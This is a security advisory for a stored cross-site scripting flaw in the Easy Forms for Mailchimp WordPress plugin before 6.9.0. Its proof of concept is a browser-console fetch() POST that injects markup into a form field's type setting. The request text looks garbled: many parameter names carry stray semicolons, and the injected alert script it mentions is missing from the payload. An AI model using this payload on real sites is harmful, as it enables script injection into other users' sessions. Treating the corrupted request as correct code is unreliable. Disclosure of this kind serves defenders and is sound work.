Easy Forms for Mailchimp < 6.9.0 - Admin+ Stored Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

PoC

1. Create a new opt-in form 2) Edit the form, and add a “First name” field. 3) Update the form 4) Staying on the same page, run the following code in your browser console: await fetch(document.forms[0].action, { "credentials": "include", "headers": { "Content-Type": "application/x-www-form-urlencoded", }, "body": `form-name=Test+form&form-description;=Test+description&field;%5BFNAME%5D%5Blabel%5D=First+Name&field;%5BFNAME%5D%5Btype%5D=birthday\"'/>&field;%5BFNAME%5D%5Bmerge%5D=FNAME&field;%5BFNAME%5D%5Bposition%5D=1&field;%5BFNAME%5D%5Bplaceholder%5D=&field;%5BFNAME%5D%5Bdefault%5D=&field;%5BFNAME%5D%5Bdescription%5D=&field;%5BFNAME%5D%5Badditional-classes%5D=&yikes-easy-mc-form-class-names;=&yikes-easy-mc-inline-form;%5B%5D=0&yikes-easy-mc-submit-button-type;%5B%5D=text&yikes-easy-mc-submit-button-text;=Submit&yikes-easy-mc-submit-button-image;=&yikes-easy-mc-submit-button-classes;=&yikes-easy-mc-form-restriction-start-date;=&yikes-easy-mc-form-restriction-start-time;=&yikes-easy-mc-form-restriction-end-date;=&yikes-easy-mc-form-restriction-end-time;=&yikes-easy-mc-form-restriction-pending-message;=Signup+is+not+yet+open%2C+and+will+be+available+on+September+12%2C+2023+at+8%3A13PM.+Please+come+back+then+to+signup.&yikes-easy-mc-form-restriction-expired-message;=This+signup+for+this+form+ended+on+September+13%2C+2023+at+8%3A13PM.&yikes-easy-mc-form-restriction-login-message;=You+need+to+be+logged+in+to+sign+up+for+this+mailing+list.&yikes-easy-mc-success-message;=&yikes-easy-mc-success-single-optin-message;=&yikes-easy-mc-user-resubscribed-success-message;=&yikes-easy-mc-user-update-link;=&yikes-easy-mc-user-subscribed-message;=&yikes-easy-mc-update-email-successful;=&yikes-easy-mc-update-email-failure;=&yikes-easy-mc-general-error-message;=&yikes-easy-mc-user-email-subject;=&yikes-easy-mc-user-email-body;=Greetings%2C%0D%0A%0D%0AA+request+has+been+made+to+update+your+Mailchimp+account+profile+information.+To+do+so+please+use+the+following+link%3A+%5Blink%5DUpdate+Mailchimp+Profile+Info%5B%2Flink%5D%0D%0A%0D%0AIf+you+did+not+request+this+update%2C+please+disregard+this+email.%0D%0A%0D%0A%26nbsp%3B%0D%0A%0D%0AThis+email+was+sent+from%3A+%5Burl%5D%0D%0A%0D%0A%26nbsp%3B%0D%0A%0D%0A%26nbsp%3B%0D%0A%3Cp+style%3D%22font-size%3A+13px%3B+margin-top%3A+5em%3B%22%3E%3Cem%3EThis+email+was+generated+by+the+%3Ca+href%3D%22http%3A%2F%2Fwww.wordpress.org%2Fplugins%2Fyikes-inc-easy-mailchimp-extender%2F%22+target%3D%22_blank%22+rel%3D%22noopener%22%3EEasy+Forms+for+Mailchimp%3C%2Fa%3E+plugin%2C+created+by+%3Ca+href%3D%22http%3A%2F%2Fwww.yikesinc.com%22+target%3D%22_blank%22+rel%3D%22noopener%22%3EYIKES+Inc.%3C%2Fa%3E%3C%2Fem%3E%3C%2Fp%3E&form;_switcher=1&associated-list;=${document.getElementById('associated-list').value }&single-double-optin;=1&update-existing-user;=1&update-existing-email;=1&form-ajax-submission;=1&redirect-user-on-submission;=0&redirect-user-to-selection;=1&custom-redirect-url;=&redirect;_new_window=0&hide-form-post-signup;=0&replace-interest-groups;=1`, "method": "POST", "mode": "cors" }); Refresh the page and notice the alert box Javascript snippet we injected in field[FNAME][type] popping up.